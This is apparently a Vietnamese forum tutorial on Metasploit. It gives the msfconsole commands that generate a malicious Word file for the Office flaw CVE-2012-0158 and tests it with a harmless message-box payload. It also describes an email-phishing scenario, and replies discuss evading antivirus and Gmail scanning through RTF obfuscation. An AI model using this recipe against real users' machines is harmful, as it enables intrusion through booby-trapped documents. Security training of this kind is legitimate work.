Giới thiệu công cụ Metasploit

[tmnt53]

Metasploit là một framework cung cấp môi trường để pentest các hệ thống phần mềm, mạng. Metasploit = Meta + Exploit, ở đó meta thể hiện sự trừu tượng hóa => một framework thiết kế cho các thao tác với exploit. Metasploit lưu trữ một database cho các exploit public hiện có, và cung cấp sẵn các công cụ để triển khai các exploit đó. Nhờ đó bạn có thể sử dụng metasploit để tạo ra các payload đi pentest các hệ thống.

Metasploit có thể cài đặt trên Windows, Linux, Mac OS, nhưng phổ biến nhất vẫn là Linux. Phiên bản Kali có cài đặt sẵn metasploit. Hôm nay mình sẽ giới thiệu metasploit tới các bạn qua một demo nhỏ: tạo payload khai thác CVE-2012-0158.

CVE-2012-0158 là lỗ hổng bảo mật của Microsoft Office được công bố vào năm 2012. Lỗ hổng cho phép hacker thực thi lệnh từ xa thông qua tệp tin doc hoặc rtf. Lỗ hổng này tồn tại trên các phần mềm: Microsoft Office 2003, 2007, 2010.

Mình sẽ khai thác lỗ hổng này trên Windows 7, với Microsoft Office 2007. Các bạn có thể tải phiên bản office 2007 tại: http://sinhvienit.net/forum/download...ck.208135.html

Mở một terminal, và mở chế độ console của metasploit: msfconsole

1. Chon module exploit


a. Tìm kiếm exploit của CVE này bằng lệnh: search CVE-2012-0158

b. Chọn module exploit tìm được bằng lệnh: use exploit/windows/fileformat/ms12_027_mscomctl_bof

​

2. Cài đặt tùy chọn cho exploit

a. Xem các tùy chọn: show options

​

b. Cài đặt tùy chọn

Để đổi tên file thành “CVE-2012-0158.doc”, ta thực hiện: set FILENAME CVE-2012-0158.doc

3. Cài đặt payload cho exploit

a. Ta xem những payload có thể dùng bằng lệnh: show payloads

​

b. Trong các payload liệt kê ra, ta chọn windows/messagebox để file mã độc chỉ biểu diễn một thao tác đơn giản là bật lên một messagebox: set payload windows/messagebox

​

c. Xem các tùy chọn của payload: show options

Để cài đặt một tùy chọn, chẳng hạn TEXT = “You are hacked”, ta thực hiện: set TEXT You are hacked

4. Tạo file khai thác
Bước cuối cùng là tạo ra file .doc ta cần bằng lệnh: exploit

​

Giờ ta test file CVE-2012-0158.doc tạo ra được, bằng cách đưa file ra máy thật (mình tạo file payload trên máy ảo Kali) và mở bằng office 2007 vừa cài đặt. Chú ý là office phải chưa được update thì mới có lỗ hổng. Và chú ý tắt Windows Defender hoặc các chương trình diệt virus khác đi.

Và hình ảnh trên là kết quả thu được, "You are hacked"!

Trong thực tế, một kịch bản khai thác có thể là:

1. File mã độc trên được hacker gắn backdoor và gửi tới nạn nhân qua email.
2. Email của nạn nhân là mail riêng của công ty, chẳng hạn, và không có cơ chế quét mã độc như Gmail.
3. Máy tính của nạn nhân bị tắt chức năng Windows Defender, và không cài đặt phần mềm anti-virus nào cả.
4. Nạn nhân mở mail ra, đọc file văn bản và lập tức nhiễm backdoor.

Hiện CVE-2012-0158 vẫn được các hacker sử dụng nhiều, mặc dù lỗi này đã có từ lâu và đa số các phần mềm anti-virus đều quét được. Nói chung, các bạn không nên mở file lạ từ Internet, email , và đừng tắt Windows Defender hay phần mềm anti-virus đi nhé.

 

Trên thực tế lỗ hổng này vẫn được sử dụng phổ biến bởi:

1. Mã khai thác chạy ổn định trên bản office 2007, 2010 chưa update.
2. Dễ dàng bypass Antivirus

Ngay cả gmail cũng bị bypass bình thường.

 

2010 chưa update

Bạn chắc không, vì lỗi này lâu lắm rồi

Dễ dàng bypass Antivirus

Bạn cho mình tài liệu dẫn chứng với. Gmail bản chất cũng là dùng các phần mềm diệt virus thôi, nên nếu bypass được các Antivirus thì qua bình thường.

 

Bạn chắc không, vì lỗi này lâu lắm rồi: Lỗi này năm 2012 nhé (Office 2007 và 2010 bản thân nó đã nói nên cái năm rồi)

Có một số tài liệu bạn có thể tham khảo:
https://www.fireeye.com/blog/threat-research/2016/05/how_rtf_malware_evad.html
http://www.decalage.info/rtf_tricks

Đúng là bypass gmail bản chất là bypass Antivirus (gmail chỉ dựa trên một số AV nổi tiếng chứ không phải là tất cả).
RTF bị bypass bởi cấu trúc phức tạp, cho phép lồng các keyword vào nhau, cho phép mix giữa binary và hex, unicode và ascii,...
Bằng cách biến đổi chèn, lồng các object, keyword một cách hợp lý vào những offset hợp lý thì sẽ bypass được AV.

Một mẫu cụ thể bypass Gmail thì tôi không thể cung cấp được vì lý do bảo mật, Thân.

 

À mình hiểu sai ý bạn. Mình tưởng bạn bảo phiên bản 2010 chưa có bản vá cho lỗi này :v
Mình cảm ơn nhé, thông tin rất bổ ích!

 

Mà liệu có bypass được Windows Defender không babyviolet thằng này do chính Microsoft làm nên mình nghĩ không thể??

 

Mà liệu có bypass được Windows Defender không babyviolet thằng này do chính Microsoft làm nên mình nghĩ không thể??

Hỏi khó quá :3

 

khi tạo ra payload nhưng không thấy ở đâu anh ơi ???

 

Khi em tạo ra payload nó sẽ hiện đường dẫn của payload ra mà.

Như trong dòng anh tô màu đỏ ấy. Chú ý folder .msf4 là folder ẩn, để nhìn thấy em phải ls /root/ -a (thêm tham số -a) thì mới thấy được

 

em bị lỗi ở phần đăng kí để có thể mở

 

em bị lỗi ở phần đăng kí để có thể mở

Em có thể nói rõ câu hỏi hơn được không?

 

Em có thể nói rõ câu hỏi hơn được không?

Thuownhf sau khi cài đặt xong người ta luôn vào thư mục lưu để mở file acces .... để đk ms có thẻ mở đc chương trình
nhưng em mở lên thì gi lỗi trang không thể ....

 

Anh không hiểu lỗi của em, anh không phải đăng ký gì mà. Cứ mở msfconsole lên thôi. Em còn bị lỗi không, up ảnh anh coi

 

Lỗi này được vá từ lâu, nhưng người dùng VN chủ yếu sài hàng lậu, ko update vá lỗi thường xuyên, do vậy lỗ hổng vẫn tồn tại rất nhiều.

 

Lỗi này được vá từ lâu, nhưng người dùng VN chủ yếu sài hàng lậu, ko update vá lỗi thường xuyên, do vậy lỗ hổng vẫn tồn tại rất nhiều.

Chuẩn. Mới đây lại có lỗi CVE-2017-0199 nữa, khai thác được trên rất nhiều phiên bản. Tấn công thử chắc được nhiều lắm.